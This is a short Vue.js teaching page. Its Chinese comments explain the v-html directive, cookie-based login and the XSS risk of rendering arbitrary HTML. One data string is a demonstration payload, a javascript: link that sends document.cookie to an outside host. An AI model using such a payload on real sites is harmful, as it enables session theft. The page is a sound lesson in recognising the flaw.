<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <div id="app">
        <!-- 
            v-html 插入文本 同时支持标签解析
            安全性问题：

            cookie : 
                第一次登陆需要校验用户名密码后 服务端发送cookie发给客户端浏览器，
                后续的访问携带cookie即可免登录校验
                cookie 本质就是字符串 json形式的字符串

                在网站上动态渲染任意HTML都是非常危险的，容器导致xss攻击

         -->
         <div v-text="name"></div>
         <div v-html="name"></div>
         <div v-html="str"></div>
         
    </div>
    <script src="../vuejs/vue.js"></script>
    <script>
        const vm = new Vue({
            el : '#app',
            data() {
                return {
                    name : '<h3>你好啊！</h3>',
                    str : '<a href=javascript:location.href="http://www.baidu.com?"+document.cookie>恶意收集cookie信息</a>'
                }
            },
        })
    </script>
</body>
</html>